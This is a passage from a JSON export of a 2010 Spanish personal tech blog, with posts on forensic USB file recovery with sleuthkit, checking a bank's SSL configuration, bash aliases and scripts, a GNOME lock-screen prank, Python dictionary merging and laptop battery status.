tabindex=\"0\"\u003e\u003ccode\u003eclass|host|device|start_time\nils|anacreonte||1288172460\nst_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_crtime|st_mode|st_nlink|st_size\n8|f|0|0|1263329350|1265842800|0|1263329350|777|0|33076\n12|f|0|0|1265738134|1288130400|0|1265738134|777|0|31609\n14|f|0|0|1263325690|1288130400|0|1263325690|777|0|28946\n16|f|0|0|1263326438|1288130400|0|1263326438|777|0|2305751\n19|f|0|0|1263327386|1288130400|0|1263327386|777|0|91028\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"4\"\u003e\n\u003cli\u003eCreamos un directorio para tener todos los archivos que se puedan\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003erecuperar\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ mkdir /tmp/miusb_tmp\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"5\"\u003e\n\u003cli\u003eRecuperamos los archivos con \u003ccode\u003eicat\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ for i in $(ils -r /tmp/miusb.dd | awk \u0026#39;{print $1}\u0026#39; FS=\u0026#34;|\u0026#34; | sed 1,3d); do\nicat -r /tmp/miusb.dd $i \u0026gt; /tmp/miusb_tmp/$i\necho $i\ndone\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"6\"\u003e\n\u003cli\u003eComprobamos el tipo de archivos recuperados\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ file /tmp/miusb_tmp/*\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e8:  OpenDocument Text\n12: PDF document, version 1.2\n14: PDF document, version 1.3\n16: PDF document, version 1.4\n19: PDF document, version 1.2\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003ccode\u003eils\u003c/code\u003e y \u003ccode\u003eicat\u003c/code\u003e vienen incluidos en el paquete \u003ccode\u003esleuthkit\u003c/code\u003e, que se\nencuentra en los repositorios. También existe \u003ccode\u003eautopsy\u003c/code\u003e, que es una\ninterfaz web para \u003ccode\u003esleuthkit\u003c/code\u003e.\u003c/p\u003e","title":"Recuperando archivos del USB"},{"content":"Leyendo la comparativa de SbD sobre el uso de SSL por parte de los bancos online, estos son los resultados de Sa Nostra:\nURL: https://linea.sanostra.es\nVerificación SSLv2 Comando:\n$ openssl s_client -ssl2 -connect linea.sanostra.es:443 Bien: no da soporte\nTipo de certificado (Normal/EV) Esto lo podemos comprobar a través del navegador. Mal: Tiene un certificado SSL sin Validación Extendida.\nLongitud de la clave RSA del certificado Comando:\n$ openssl s_client -connect linea.sanostra.es:443 Mal: La clave es de 1024 bits.\nSoporte de algoritmos débiles Comando:\n$ openssl s_client -cipher LOW:EXP -connect linea.sanostra.es:443 Bien: No admite algoritmos \u0026lsquo;débiles\u0026rsquo;, cuya longitud de clave sea de 56 ó 64 bits.\nPuntuación final: Aprobado\n","permalink":"http://karpoke.ignaciocano.com/2010/10/25/sa-nostra-y-ssl/","summary":"\u003cp\u003eLeyendo la comparativa de \u003ca href=\"http://www.securitybydefault.com/2010/10/bancos-y-ssl-quien-aprueba.html\"\u003eSbD\u003c/a\u003e sobre el uso de SSL por parte de los\nbancos online, estos son los resultados de Sa Nostra:\u003c/p\u003e\n\u003cp\u003eURL: \u003ca href=\"https://linea.sanostra.es\"\u003ehttps://linea.sanostra.es\u003c/a\u003e\u003c/p\u003e\n\u003ch2 id=\"verificación-sslv2\"\u003eVerificación SSLv2\u003c/h2\u003e\n\u003cp\u003eComando:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ openssl s_client -ssl2 -connect linea.sanostra.es:443\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eBien: no da soporte\u003c/p\u003e\n\u003ch2 id=\"tipo-de-certificado-normalev\"\u003eTipo de certificado (Normal/EV)\u003c/h2\u003e\n\u003cp\u003eEsto lo podemos comprobar a través del navegador.\nMal: Tiene un certificado SSL sin Validación Extendida.\u003c/p\u003e\n\u003ch2 id=\"longitud-de-la-clave-rsa-del-certificado\"\u003eLongitud de la clave RSA del certificado\u003c/h2\u003e\n\u003cp\u003eComando:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ openssl s_client -connect linea.sanostra.es:443\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eMal: La clave es de 1024 bits.\u003c/p\u003e","title":"Sa Nostra y SSL"},{"content":"\nkeyboard cult\n","permalink":"http://karpoke.ignaciocano.com/2010/10/23/fuck-yeah/","summary":"\u003cp\u003e\u003cimg alt=\"Keyboard\" loading=\"lazy\" src=\"/images/keyboard-300x125.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.codinghorror.com/blog/2010/10/the-keyboard-cult.html\"\u003ekeyboard cult\u003c/a\u003e\u003c/p\u003e","title":"Fuck yeah"},{"content":"Facebook permite buscar usuarios por su dirección de correo. De hecho, es así como encuentra amigos en GMail o en el Messenger.\nSi usamos GMail, podemos seguir usando nuestro correo personal pero evitando que nos puedan localizar usando éste.\nPodemos añadir un sufijo a nuestro nick en la dirección de correo, precedido por el signo +, y los correos enviados a esa dirección nos seguirán llegando a nuestra cuenta. Por ejemplo, los correos enviados a spamme+please@gmail.com, seguirán llegando a la cuenta spamme@gmail.com.\nAsí mismo, también podemos intercalar puntos \u0026ldquo;.\u0026rdquo; entre los caracteres de nuestro nombre y también nos llegarán a nosotros. Por ejemplo, los correos enviados a spam.me@gmail.com o sp.am.me@gmail.com, también llegarán a spamme@gmail.com.\n","permalink":"http://karpoke.ignaciocano.com/2010/10/23/senoras-que-se-ponen-un-nombre-falso-en-facebook-pero-usan-su-direccion-de-correo-personal/","summary":"\u003cp\u003eFacebook permite buscar usuarios por su dirección de correo. De hecho,\nes así como encuentra amigos en GMail o en el Messenger.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Bag Face\" loading=\"lazy\" src=\"/images/bag_face-227x300.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eSi usamos GMail, podemos seguir usando nuestro correo personal pero\nevitando que nos puedan localizar usando éste.\u003c/p\u003e\n\u003cp\u003ePodemos añadir un sufijo a nuestro \u003cem\u003enick\u003c/em\u003e en la dirección de correo,\nprecedido por el signo \u003ccode\u003e+\u003c/code\u003e, y los correos enviados a esa dirección nos\nseguirán llegando a nuestra cuenta. Por ejemplo, los correos enviados a\n\u003ccode\u003espamme+please@gmail.com\u003c/code\u003e, seguirán llegando a la cuenta\n\u003ccode\u003espamme@gmail.com\u003c/code\u003e.\u003c/p\u003e","title":"Señoras que se ponen un nombre falso en Facebook pero usan su dirección de correo personal"},{"content":"¿A veces no os gustaría saber si el que se mete en vuestra casa no es el maestro de las llaves?\nEn ubuntu, los scripts que estén en el directorio /etc/profile.d se ejecutan cada vez que un usuario inicia la sesión. Si nuestro servidor sólo lo usamos nosotros, y si no también, podríamos enviarnos un correo cada vez que un usuario se conecta. Así, al menos, podríamos saber si alguien ha entrado con nuestro usuario.\n","permalink":"http://karpoke.ignaciocano.com/2010/10/22/la-guardiana-de-la-puerta/","summary":"\u003cp\u003e¿A veces no os gustaría saber si el que se mete en vuestra casa no es el\nmaestro de las llaves?\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"la guardiana de la puerta\" loading=\"lazy\" src=\"/images/guardiana-300x260.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eEn \u003ca href=\"http://serverfault.com/questions/77983/run-shell-script-each-time-any-user-logs-on\"\u003eubuntu\u003c/a\u003e, los \u003cem\u003escripts\u003c/em\u003e que estén en el directorio \u003ccode\u003e/etc/profile.d\u003c/code\u003e\nse ejecutan cada vez que un usuario inicia la sesión. Si nuestro\nservidor sólo lo usamos nosotros, y si no también, podríamos \u003ca href=\"http://terminus.ignaciocano.com/wp-uploads/linked/user-has-logged-in.sh\"\u003eenviarnos\nun correo cada vez que un usuario se conecta\u003c/a\u003e. Así, al menos,\npodríamos saber si alguien ha entrado con nuestro usuario.\u003c/p\u003e","title":"La guardiana de la puerta"},{"content":"Como bien dice el agente Smith, es cuestión de contrastar un poco. Octubres con 5 viernes, 5 sábados y 5 domingos, de aquí al 2038, si es que llegamos:\n$ for ((i=2011; i \u0026lt; 2039; i++)); do cal 10 $i; done | grep -B2 -A4 \u0026#34; 1 2 3\u0026#34; Octubre 2021 lu ma mi ju vi sá do 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 -- Octubre 2027 lu ma mi ju vi sá do 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 -- Octubre 2032 lu ma mi ju vi sá do 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 -- Octubre 2038 lu ma mi ju vi sá do 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ","permalink":"http://karpoke.ignaciocano.com/2010/10/07/de-aqui-al-2038/","summary":"\u003cp\u003eComo bien dice el agente Smith, es cuestión de contrastar un poco.\n\u003ca href=\"http://rinzewind.org/archives/2010/10/07/5-viernes-5-sabados-5-domingos/\"\u003eOctubres\u003c/a\u003e con 5 viernes, 5 sábados y 5 domingos, de aquí al \u003ca href=\"http://es.wikipedia.org/wiki/Problema_del_a%C3%B1o_2038\"\u003e2038\u003c/a\u003e,\nsi es que llegamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ for ((i=2011; i \u0026lt; 2039; i++)); do cal 10 $i; done |\ngrep -B2 -A4  \u0026#34;             1  2  3\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    Octubre 2021\nlu ma mi ju vi sá do\n             1  2  3\n 4  5  6  7  8  9 10\n11 12 13 14 15 16 17\n18 19 20 21 22 23 24\n25 26 27 28 29 30 31\n--\n    Octubre 2027\nlu ma mi ju vi sá do\n             1  2  3\n 4  5  6  7  8  9 10\n11 12 13 14 15 16 17\n18 19 20 21 22 23 24\n25 26 27 28 29 30 31\n--\n    Octubre 2032\nlu ma mi ju vi sá do\n             1  2  3\n 4  5  6  7  8  9 10\n11 12 13 14 15 16 17\n18 19 20 21 22 23 24\n25 26 27 28 29 30 31\n--\n    Octubre 2038\nlu ma mi ju vi sá do\n             1  2  3\n 4  5  6  7  8  9 10\n11 12 13 14 15 16 17\n18 19 20 21 22 23 24\n25 26 27 28 29 30 31\n\u003c/code\u003e\u003c/pre\u003e","title":"De aquí al 2038"},{"content":"Leyendo el artículo de análisis de cabeceras de SbD y, en particular, lo relacionado con las cabeceras no estándar, es decir, las que comienzan por X-, se me ha ocurrido que estaría bien ver qué debe haber por el mundo:\nSuponiendo que el archivo sites.txt contiene un listado de los sitios que queremos comprobar:\n$ for url in $(cat sites.txt); do \u0026gt; echo $url \u0026gt; curl -sI $url | grep \u0026#34;^X-\u0026#34; \u0026gt; done \u0026gt; headers.txt Es cierto que se podría haber realizado de otras formas:\n$ HEAD barrapunto.com $ nc barrapunto.com 80 GET / HTTP/1.1 $ telnet barrapunto.com 80 GET / HTTP/1.1 Host:barrapunto.com $ wget -qS barrapunto.com $ w3m -dump_head barrapunto.com $ lynx -head -dump \u0026#34;http://barrapunto.com\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2010/10/07/mostrando-las-cabeceras-http/","summary":"\u003cp\u003eLeyendo el artículo de \u003ca href=\"http://www.securitybydefault.com/2010/08/analizando-cabeceras-http-just-for-fun.html\"\u003eanálisis de cabeceras\u003c/a\u003e de SbD y, en\nparticular, lo relacionado con las cabeceras no estándar, es decir, las\nque comienzan por \u003ccode\u003eX-\u003c/code\u003e, se me ha ocurrido que estaría bien ver qué debe\nhaber por el mundo:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"HTTP Header\" loading=\"lazy\" src=\"/images/http_header.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eSuponiendo que el archivo \u003ca href=\"http://terminus.ignaciocano.com/wp-uploads/linked/sites.txt\"\u003esites.txt\u003c/a\u003e contiene un listado de los\nsitios que queremos comprobar:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ for url in $(cat sites.txt); do\n\u0026gt;   echo $url\n\u0026gt;   curl -sI $url | grep \u0026#34;^X-\u0026#34;\n\u0026gt;   done \u0026gt; headers.txt\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEs cierto que se podría haber realizado de otras formas:\u003c/p\u003e","title":"Mostrando las cabeceras HTTP"},{"content":"El ataque David Hasselhof es una de las técnicas de guerrilla de oficina con la mejor relación coste/humillación ^[cita\\ requerida]^, basta encontrarse una sesión de usuario abierta (y no protegida contra este \u0026ldquo;ataque\u0026rdquo;) y, ¡zas!, en toda la boca.\nNo sé si un aviso disuasorio como medida de prevención contra este tipo de ataque será efectivo, pero me ha hecho preguntarme cómo podríamos incluirlo en Gnome.\nCapturas de pantalla Curiosamente, lo primero que he encontrado sobre la ventana de desbloquear la pantalla es que no se puede realizar una captura de pantalla de la misma pulsando la tecla Impr Pant; pruébalo!\nEsto no significa que no se pueda realizar, y no hablo de recurrir a métodos como un escritorio remoto o una máquina virtual, sino desde la consola:\n$ sleep 5; import -window root screenshot.png Tras escribir estos comandos en una consola, tendremos 5 segundos para que se realice una captura de pantalla, con el comando import, y que se guardará como screenshot.png.\nPara que la captura se realice de la pantalla de desbloqueo, primero debemos bloquear la sesión. Vamos al menú de sesión, bloquear la pantalla y una vez bloqueada, movemos el ratón o pulsamos alguna tecla para que aparezca la ventana de desbloqueo. También podemos bloquear la sesión pulsando la combinación de teclas Ctrl+Alt+L.\nYa puestos, si queremos realizar una captura de pantalla en un ordenador remoto, estando conectados a través de ssh, debemos, además de inicializar la variable de entorno DISPLAY, cambiar previamente al terminal gráfico, /dev/tty7, con el comando chvt, más o menos lo que haríamos con la combinación de teclas Ctrl+Alt+F7 si fuese en local:\n$ chvt 7; sleep 5; DISPLAY=:0.0 import -window root screenshot.png Ventana de desbloqueo Para añadir el mensaje disuasorio, debemos fijarnos en el fichero /usr/share/gnome-screensaver/lock-dialog-default.ui. En ese fichero se define el contenido de la ventana de desbloqueo, es decir, cosas como:\nauth-realname-label, el nombre real del usuario, auth-username-label, el nombre de usuario y el del equpo, auth-status-label, el mensaje de estado El mensaje de estado se utiliza, cuando es necesario, para mostrar mensajes como que se está comprobando la contraseña o que ésta es incorrecta. Utilizaremos este campo para mostrar inicialmente el aviso disuasorio. Para esto, modificamos la propiedad label del objeto con el id=auth-status-label:\nAVISO: Terminal protegida contra ataques \u0026lsquo;Hasselhoff\u0026rsquo;. En caso de ser detectado, se tomarán represalias.\nEl ataque David Hasselhoff Receta para Ubuntu:\nDescargar una imagen de David Hasselhoff como esta Abrirla con el visor de imágenes de Gnome (EOG, Eye of Gnome) Menú Imagen \u0026gt; Establecer como fondo de escritorio, o Ctrl+F8 También lo podríamos hacer de forma remota, pero aquí tiene menos gracia, ya que, o bien tenemos acceso a la cuenta de usuario o bien tenemos privilegios de administrador. Aún así, es difícil resistirse.\nDescargamos la imagen: `wget http://www.una-web.com/la/imagen/de/david.jpg` Ponemos la imagen de fondo: `gconftool-2 -t str --set /desktop/gnome/background/picture_filename /ruta/aboluta/a/la/imagen/david.jpg` » más sobre el ataque Hasselhoff en el lado del mal\n","permalink":"http://karpoke.ignaciocano.com/2010/10/06/de-pantallas-bloqueadas-capturas-de-pantalla-y-david-hasselhoff/","summary":"\u003cp\u003eEl \u003ca href=\"http://windowstips.wordpress.com/2008/06/08/el-caso-del-hacker-de-la-oficina/\"\u003eataque David Hasselhof\u003c/a\u003e es una de las técnicas de guerrilla de\noficina con la mejor relación coste/humillación ^\u003cem\u003e[cita\\ requerida]\u003c/em\u003e^,\nbasta encontrarse una sesión de usuario abierta (y no protegida contra\neste \u0026ldquo;ataque\u0026rdquo;) y, ¡zas!, en toda la boca.\u003c/p\u003e\n\u003cp\u003eNo sé si un \u003ca href=\"http://www.seguridadapple.com/2010/10/mostrar-avisos-disuasorios-en-la.html\"\u003eaviso disuasorio\u003c/a\u003e como medida de prevención contra este\ntipo de ataque será efectivo, pero me ha hecho preguntarme cómo\npodríamos incluirlo en Gnome.\u003c/p\u003e\n\u003ch2 id=\"capturas-de-pantalla\"\u003eCapturas de pantalla\u003c/h2\u003e\n\u003cp\u003eCuriosamente, lo primero que he encontrado sobre la ventana de\ndesbloquear la pantalla es que no se puede realizar una captura de\npantalla de la misma pulsando la tecla \u003ccode\u003eImpr Pant\u003c/code\u003e; pruébalo!\u003c/p\u003e","title":"De pantallas bloqueadas, capturas de pantalla y David Hasselhoff"},{"content":"Cuando actualizamos un diccionario con otro en Pyhton, el método update copia las entradas del diccionario fuente en el diccionario destino, sobreescribiendo las de éste si la entrada existe en ambos diccionarios.\nEn particular, si un diccionario contiene una entrada que es a su vez otro diccionario, no se realiza una actualización sobre ésta, por lo que se pierden los valores que no estuvieran en el diccionario fuente.\nIlustremos este comportamiento con un ejemplo:\n\u0026gt;\u0026gt;\u0026gt; d1 = {\u0026#39;a\u0026#39;: 1, \u0026#39;b\u0026#39;: {\u0026#39;c\u0026#39;: 3, \u0026#39;d\u0026#39;: 4}} \u0026gt;\u0026gt;\u0026gt; d2 = {\u0026#39;a\u0026#39;: 11, \u0026#39;b\u0026#39;: {\u0026#39;c\u0026#39;: 33}} \u0026gt;\u0026gt;\u0026gt; d1.update(d2) \u0026gt;\u0026gt;\u0026gt; print d1 {\u0026#39;a\u0026#39;: 11, \u0026#39;b\u0026#39;: {\u0026#39;c\u0026#39;: 33}} d1 contiene a su vez un diccionario, d1['b'], y al realizar la actualización hemos perdido el valor d1['b']['d'].\nNos podría interesar que, en lugar de sobreescribir cada entrada del diccionario destino, compruebe primero si es un diccionario y realice una actualización sobre éste.\n\u0026gt;\u0026gt;\u0026gt; def update_dict_r(dst, src): ... \u0026#34;\u0026#34;\u0026#34; updates a diccionary recursively, performing an updating on each ... dictionary inside ... \u0026#34;\u0026#34;\u0026#34; ... for k, v in src.items(): ... if k in dst and isinstance(v, dict): ... update_dict_r(dst[k], src[k]) ... else: ... dst[k] = src[k] \u0026gt;\u0026gt;\u0026gt; d1 = {\u0026#39;a\u0026#39;: 1, \u0026#39;b\u0026#39;: {\u0026#39;c\u0026#39;: 3, \u0026#39;d\u0026#39;: 4}} \u0026gt;\u0026gt;\u0026gt; d2 = {\u0026#39;a\u0026#39;: 11, \u0026#39;b\u0026#39;: {\u0026#39;c\u0026#39;: 33}} \u0026gt;\u0026gt;\u0026gt; update_dict_r(d1, d2) \u0026gt;\u0026gt;\u0026gt; print d1 {\u0026#39;a\u0026#39;: 11, \u0026#39;b\u0026#39;: {\u0026#39;c\u0026#39;: 33, \u0026#39;d\u0026#39;: 4}} Ahora ya no no se ha sobreescrito el diccionario d1['b'], si no que se ha realizado una actualización con el diccionario d2['b'], con lo que no hemos perdido el valor de d1['b']['d'].\nEsto podemos utilizarlo, por ejemplo, en Django, para definir un diccionario con datos por defecto, que sea sobreescrito con aquellos valores que queramos personalizar.\nEn el archivo que mapea las direcciones, urls.py, tendremos algo como:\ninfo_dict = { \u0026#39;template_name\u0026#39;: \u0026#39;mymodel_paginated_list.html\u0026#39;, \u0026#39;extra_context\u0026#39;:{\u0026#39;paginate_by\u0026#39;:2}, } urlpatterns = patterns(\u0026#39;\u0026#39;, url(r\u0026#39;^$\u0026#39;, mymodel_list, info_dict, name=\u0026#34;myapp_mymodel_list\u0026#34;), } Aquí le estamos pasando a la vista mymodel_list (que previsiblemente mostrará una lista de los elementos de mymodel), una variable que queremos utilizar en la plantilla, paginate_by.\nPara la realizar la pagínación de una lista de elementos podemos utilizar la aplicación django-pagination, con lo que la gestión de la paginación y la navegación se vuelve increíblemente sencilla, necesitando únicamente añadir un par de etiquetas a la plantilla. Una de estas etiquetas es {% autopaginate object_list paginate_by %}, que, opcionalmente, admite como parámetro el número de elementos por página. De ahí que pasemos la variable paginate_by en el extra_context y no como como parámetro de la vista.\nAhora, si queremos que pasar este valor sea opcional, necesitamos especificar un valor por defecto, antes de renderizar la plantilla. En la vista, dentro del fichero views.py, tendremos algo como:\nfrom django.views.generic.list_detail import object_list def mymodel_list(request, **info_dict): \u0026#34;\u0026#34;\u0026#34; Returns a paginated list of the model elements \u0026#34;\u0026#34;\u0026#34; default_dict = { \u0026#39;queryset\u0026#39;: Mymodel.objects.all(), \u0026#39;template_name\u0026#39;: \u0026#39;myapp_list.html\u0026#39;, \u0026#39;extra_context\u0026#39;: { \u0026#39;paginate_by\u0026#39;: settings.PAGINATE_BY, \u0026#39;other\u0026#39;: \u0026#39;other vars\u0026#39;, } } default_dict.update(info_dict) return object_list(request, **default_dict) De esta forma, perdemos el valor de others, dentro de extra_context. Si además este valor se utiliza, por ejemplo, en un tag, obtendremos una bonita excepción Caught KeyError while rendering: 'other'.\nUna solución sería utilizar la función que hemos definido antes para actualizar el diccionario recursivamente, y en lugar de poner:\ndefault_dict.update(info_dict) pondremos:\nupdate_dict_r(default_dict, info_dict) ","permalink":"http://karpoke.ignaciocano.com/2010/09/28/actualizacion-recursiva-de-un-diccionario-en-python/","summary":"\u003cp\u003eCuando actualizamos un diccionario con otro en Pyhton, el método \u003ccode\u003eupdate\u003c/code\u003e copia\nlas entradas del diccionario fuente en el diccionario destino, sobreescribiendo\nlas de éste si la entrada existe en ambos diccionarios.\u003c/p\u003e\n\u003cp\u003eEn particular, si un diccionario contiene una entrada que es a su vez otro\ndiccionario, no se realiza una actualización sobre ésta, por lo que se pierden\nlos valores que no estuvieran en el diccionario fuente.\u003c/p\u003e\n\u003cp\u003eIlustremos este comportamiento con un ejemplo:\u003c/p\u003e","title":"Actualización recursiva de un diccionario en Python"},{"content":" No me acuerdo de olvidarte.\nSi lo primero que haces nada más iniciar una sesión es abrir el terminal. Varias ventanas, varias pestañas. screen, terminator o byobu. Es posible que, alguna vez, se te haya pasado por la cabeza que sería interesante guardar una nota sobre algo que estamos haciendo, algo que quisiéramos recordar más tarde, algo que quisiéramos no olvidar, algo que está relacionado con el directorio en el que estamos.\nSi, por ejemplo, tenemos un directorio con imágenes reducidas a un tamaño concreto, y queremos que, cuando haya pasado un tiempo y volvamos a este directorio, podamos recordar dicho tamaño de forma rápida y directa, de un vistazo, sin tener que (volver a) investigar cual era ese tamaño. Si estamos editando un fichero, podemos incluir la nota en un comentario dentro del fichero, pero es posible que no nos acordemos de dicha nota hasta que vayamos a editar ese fichero nuevamente, quizá por otro motivo. Si quisiéramos recordar muchas cosas, tenerlas en un único sitio no es lo más cómodo, ya que la lista en seguida crece. Si tenemos que enviar un correo electrónico más tarde, el directorio de usuario es un lugar frecuentemente transitado. Si quieres recordar el comando para buscar documentos repetidos en el directorio de descargas.\nSería interesante que, nada más llegar a ese directorio, se mostrasen las notas que habíamos dejado ahí previamente. Como si tuviéramos post-it’s escritos por toda la casa.\nPodemos conseguir esto añadiendo un alias para el comando cd que, además de cambiar de directorio, busque si hay notas y las muestre. Los alias se definen en el fichero ~/.bash_aliases:\nalias cd=\u0026#39;source /home/user/scripts/memento.sh\u0026#39; El código del script memento.sh que nos permite hacer esto es:\nMSGFILE=\u0026#34;.msg\u0026#34; \\cd \u0026#34;$@\u0026#34; if [ -r \u0026#34;$MSGFILE\u0026#34; ]; then awk \u0026#34;\\$0!~/^#/{ print \u0026#39;\u0026gt;\u0026gt;\u0026gt;\u0026#39;,\\$0 }\u0026#34; $MSGFILE fi Para dejar una nota en un directorio:\n$ echo \u0026#34;Lorem ipsus dolor sit amet\u0026#34; \u0026gt;\u0026gt; .msg Actualizado el 5 de agosto de 2011 Ahora ya podemos utilizar el propio script para ir añadiendo notas. También he incluido la opción de que nos informe del número de elementos ocultos que hay en el directorio. El script debe estar en el PATH del sistema, o podemos especificar la ruta hasta él, y permisos de ejecución.\n$ memento.sh \u0026#34;Lorem ipsum dolor sit amet\u0026#34; Cuando visitemos dicho directorio:\n$ cd 19 hidden files and directories found. \u0026gt;\u0026gt;\u0026gt; Lorem ipsum dolor sit amet Como colofón, comentar que si queremos ver cuáles son esos ficheros y directorios ocultos podemos ejecutar:\n$ ls -d .* | sed 1,2d Mejor aún, podemos crear un alias:\n$ alias vh=\u0026#39;ls -d .* | sed 1,2d\u0026#39; ","permalink":"http://karpoke.ignaciocano.com/2010/09/26/memento-en-bash/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNo me acuerdo de olvidarte.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"Memento Polaroid Natalie Clean\" loading=\"lazy\" src=\"/images/memento_polaroids_natalieclean_18700997-248x300.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eSi lo primero que haces nada más iniciar una sesión es abrir el\nterminal. Varias ventanas, varias pestañas. \u003ccode\u003escreen\u003c/code\u003e, \u003ccode\u003eterminator\u003c/code\u003e o\n\u003ccode\u003ebyobu\u003c/code\u003e. Es posible que, alguna vez, se te haya pasado por la cabeza que\nsería interesante guardar una nota sobre algo que estamos haciendo, algo\nque quisiéramos recordar más tarde, algo que quisiéramos no olvidar,\nalgo que está relacionado con el directorio en el que estamos.\u003c/p\u003e","title":"Memento en Bash"},{"content":"Algunos falsos mitos de las baterías del portátil:\nEs necesario que se agote la batería para ponerla a cargar, no se debe dejar el portátil siempre enchufado a la corriente, ni se debe suspender conectado a la corriente. También existen técnicas para alargar la vida de la batería:\nenchufa el portátil (y enciéndelo, si quieres) hasta que la batería este cargada y déjalo cargando 2 horas más, desenchufa el portátil y espera a que se gaste la batería e hiberne enchufa el portátil sin encenderlo hasta que se cargue la batería realizar estas operaciones cada 2 ó 3 meses En principio, las baterías de los portátiles ya incorporan un mecanismo que corta la corriente cuando éstas están totalmente cargadas, evitando así la fatiga por la carga continua.\nDe todas formas, he pensado que sería buena idea obtener un aviso cuando la batería ha terminado de cargarse, por si aún así queremos desenchufar el portátil de la corriente.\nDentro del directorio /proc/acpi/battery/BAT0 hay unos ficheros que contienen información del estado de la batería:\n$ cat /proc/acpi/battery/BAT0/state present: yes capacity state: ok charging state: charged present rate: unknown remaining capacity: 1065 mAh present voltage: 12462 mV $ cat /proc/acpi/battery/BAT0/info present: yes design capacity: 4400 mAh last full capacity: 1130 mAh battery technology: rechargeable design voltage: 12414 mV design capacity warning: 113 mAh design capacity low: 56 mAh capacity granularity 1: 35 mAh capacity granularity 2: 8 mAh model number: M50EA0 serial number: 00001 battery type: LiOn OEM info: OEM Podemos utilizar esta información para escribir un pequeño script que compruebe si la batería está cargando o si ya ha terminado:\n$ if [[ -n \u0026#34;$(awk /charged/\u0026#39;{print $3}\u0026#39; /proc/acpi/battery/BAT0/state)\u0026#34; ]]; then \u0026gt; export DISPLAY=:0.0 \u0026gt; notify-send -u critical --icon=gtk-dialog-error \u0026#34;Unplug the AC power\u0026#34; \u0026gt; fi Luego podemos meter esto en el script check-battery-status.sh y añadirlo al cron para que lo ejecute regularmente, por ejemplo, cada 5 minutos:\n$ */5 * * * * /home/user/check-battery-status.sh En lugar de examinar el fichero /proc/acpi/battery/BAT0/state directamente, podemos utilizar algunos comandos que nos muestran esta información de diferentes formas, ya sea mostrando información relativa a un aspecto concreto, o ampliando dicha información. Por ejemplo, el comando acpitool:\n$ acpitool -h Usage: acpitool [option] . . . Shows ACPI information from the /proc/acpi filesystem, like battery status, temperature, or ac power. Can also suspend your machine (if supported). -a, --ac_adapter AC adapter information -A, --Asus show supported Asus ACPI extensions (LCD brightness level, video out routing DSTD/acpi4asus info) -b battery status, available batteries only -B, --battery battery status, all info on all battery entries -c, --cpu CPU information (type, speed, cache size, frequency scaling, c-states, . . .) -e show just about everything -f, --fan show fan status -F x force fan on (x=1) or switch back to auto mode (x=0). (Toshiba only) -h, --help show this help screen -j eject ultrabay device (Thinkpad only) -l x set LCD brightness level to x, where x is 0..7 (Toshiba and Thinkpad only) -m x switch the mail led on (x=1) or off (x=0) (Asus only) -n x switch the wireless led on (x=1) or off (x=0). (Asus only) -o x set LCD on (x=1) or off (x=0). (Asus only) -s, --suspend suspend to memory (sleep state S3), if supported -S suspend to disk (sleep state S4), if supported -t, --thermal thermal information, including trip_points -T, --Toshiba show supported Toshiba ACPI extensions (LCD brightness level, video out routing, fan status) -v be more verbose (more detailed error messages, only usefull combined with other options) -V, --version show application version number and release date -w, --wakeup show wakeup capable devices -W x enable/disable wakeup capable device x. The x can be seen when invoking -w first. -z x set Asus LCD brightness level to x, where x is 0..15 (Asus only). If invoked without options, acpitool displays information about available batteries, AC adapter and thermal information. For more info, type man acpitool at the prompt. AcpiTool v0.5.1, released 13-Aug-2009 Homepage: http://freeunix.dyndns.org:8000/site2/acpitool.shtml Con el argumento -B nos muestra el porcentaje de capacidad perdida de la batería. La mía ya está agonizando:\n$ acpitool -B Battery #1 : present Remaining capacity : 887 mWh, 100.0%, 00:00:00 Design capacity : 5200 mWh Last full capacity : 887 mWh, 17.06% of design capacity Capacity loss : 82.94% Present rate : 1 mW Charging state : charged Battery type : non-recharge Model number : 0 mWh Serial number : Dell Otro comando es acpi, que hace más o menos lo mismo:\n$ acpi -h Usage: acpi [OPTION]... Shows information from the /proc filesystem, such as battery status or thermal information. -b, --battery battery information -i, --details show additional details if available: - battery capacity information - temperature trip points -a, --ac-adapter ac 